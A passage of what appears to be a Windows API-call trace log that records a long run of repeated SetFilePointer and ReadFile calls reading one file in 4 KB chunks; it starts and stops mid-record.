SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2e000 [0081.101] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x2f000 [0081.102] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.102] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x30000 [0081.103] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.104] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x31000 [0081.104] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.104] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x32000 [0081.104] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.105] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x33000 [0081.105] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.105] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x34000 [0081.105] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.106] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x35000 [0081.106] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.106] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x36000 [0081.106] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.107] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x37000 [0081.107] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.107] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x38000 [0081.107] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x39000 [0081.108] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.108] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3a000 [0081.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.109] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3b000 [0081.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.109] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3c000 [0081.109] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.110] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3d000 [0081.110] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.110] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3e000 [0081.110] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.111] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x3f000 [0081.111] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.111] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x40000 [0081.111] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x41000 [0081.114] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x42000 [0081.114] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.114] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x43000 [0081.114] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x44000 [0081.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x45000 [0081.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.115] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x46000 [0081.115] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.116] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x47000 [0081.116] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.116] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x48000 [0081.117] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.118] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x49000 [0081.118] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.118] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4a000 [0081.118] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.119] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4b000 [0081.119] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.119] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4c000 [0081.119] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.120] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4d000 [0081.120] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.120] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4e000 [0081.120] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.121] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x4f000 [0081.121] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.121] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x50000 [0081.121] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.122] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x51000 [0081.122] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x52000 [0081.123] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x53000 [0081.123] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.123] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x54000 [0081.124] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.124] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x55000 [0081.124] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.125] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x56000 [0081.125] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.125] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x57000 [0081.125] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.126] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x58000 [0081.126] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x59000 [0081.127] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5a000 [0081.127] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.127] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5b000 [0081.128] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.128] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5c000 [0081.128] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.128] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5d000 [0081.128] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.129] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5e000 [0081.129] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.129] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x5f000 [0081.129] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.130] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x60000 [0081.130] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.130] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x61000 [0081.130] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.131] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x62000 [0081.132] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.132] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x63000 [0081.132] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x64000 [0081.133] ReadFile (in: hFile=0x4bc, lpBuffer=0x1daa7cc, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x4ebf208, lpOverlapped=0x0 | out: lpBuffer=0x1daa7cc*, lpNumberOfBytesRead=0x4ebf208*=0x1000, lpOverlapped=0x0) returned 1 [0081.133] SetFilePointer (in: hFile=0x4bc, lDistanceToMove=0, lpDistanceToMoveHigh=0x4ebf1dc*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x4ebf1dc*=0) returned 0x65000 [0081.133] ReadFile (in: 